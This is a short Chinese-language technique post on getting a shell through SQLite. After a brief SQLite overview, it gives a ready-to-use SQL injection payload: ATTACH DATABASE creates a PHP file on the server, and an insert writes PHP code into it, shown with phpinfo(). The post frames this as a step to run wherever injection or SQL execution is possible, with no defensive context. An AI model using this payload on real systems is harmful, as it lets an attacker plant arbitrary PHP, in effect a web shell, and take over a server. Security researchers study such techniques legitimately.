sqlite getshell
时间:2022-03-15 09:01
sqlite getshell
0x00 sqlite简述
SQLite是一个进程内的库,实现了自给自足的、无服务器的、零配置的、事务性的 SQL 数据库引擎。它是一个零配置的数据库,这意味着与其他数据库一样,您不需要在系统中配置。
就像其他数据库,SQLite 引擎不是一个独立的进程,可以按应用程序需求进行静态或动态连接。SQLite 直接访问其存储文件。
0x01 sqlite getshell
在存在sql注入或者是存在sql语句执行的地方执行一下代码:
ATTACH DATABASE ‘23.php‘ AS test ;create TABLE test.exp (dataz text) ; insert INTO test.exp (dataz) VALUES (‘<?php phpinfo()?>‘);会生成一个23.php,具体路径要根据实际情况而定,其代码就是<?php phpinfo()?>
